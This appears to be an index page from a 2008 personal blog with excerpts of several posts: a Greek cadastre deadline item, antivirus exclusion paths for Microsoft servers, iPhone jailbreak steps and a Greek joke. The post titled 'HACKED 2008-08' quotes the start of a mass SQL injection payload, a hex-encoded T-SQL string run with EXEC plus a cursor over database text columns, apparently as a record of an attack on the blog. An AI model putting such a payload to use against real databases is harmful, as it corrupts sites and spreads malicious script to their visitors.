Παράταση έως τις 31 Δεκεμβρίου αναμένεται να δοθεί από την «Κτηματολόγιο ΑΕ», σύμφωνα με εκτιμήσεις συμβολαιογράφων. Οι εκτιμήσεις προβλέπουν πως η τρίτη προθεσμία δεν είναι δυνατόν να αποφευχθεί, καθώς ασφαλιστικοί οργανισμοί, τράπεζες και δημόσιοι φορείς δεν έχουν ακόμα δηλώσει τα …

κτηματολογιο Read more »

2008 Exchange 2007 C:PROGRAM FILESMICROSOFTEXCHANGE SERVERMAILBOXFIRST STORAGE GROUP C:PROGRAM FILESMICROSOFTEXCHANGE SERVERMAILBOXSECOND STORAGE GROUP SQL Servers C:PROGRAM FILESMICROSOFT SQL SERVERMSSQL10.SQLEXPRESSMSSQLDATA C:WSUSSUSDBUPDATESERVICESDBFILES C:PROGRAM FILES (X86)MICROSOFT SQL SERVERMSSQL.1MSSQLDATA C:WINDOWSSYSMSISSEEMSSQL.2005MSSQLDATA   *Domain Controller related exclusions* Active Directory database files = C:WINDOWSNTDS SYSVOL C:WINDOWSSYSVOL NTFRS …

SBS 2003 / 2008 & Antivirus Read more »

Create Account without Visa http://www.tunecore.com/freealbum Install iTunes 7.6.1 Upgrade to 1.1.4 ZiPhone 3.0 Install iTunes 8.0 Upgrade to 2.1 quickpwn21-1   +cydia Install Greek [CYDIA http://ftp4u.gr/iphone/apt/] BiteSMS  [sms forward & delete]

http://www.trustedsource.org/blog/142/New-SQL-Injection-Attack-Infecting-Machines http://it.slashdot.org/article.pl?sid=08/08/12/1943217 DECLARE @S CHAR(4000); SET @S=CAST(0x4445434C41524520405420766  …  37572736F72 AS CHAR(4000)); EXEC(@S); DECLARE @T varchar(255) ,@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN …

HACKED 2008-08 Read more »

Ένα νεαρό ζευγάρι, πολύ ερωτευμένο, αποφασίζει να παντρευτεί, όταν την τελευταία νύχτα πριν τον γάμο, συμβαίνει ένα τραγικό ατύχημα και σκοτώνονται. Βρίσκονται προ των πυλών του Παραδείσου, να συνοδεύονται από τον Αγιο Πέτρο. Μερικές εβδομάδες αργότερα, ο νεαρός συναντιέται με …

2008-08 Read more »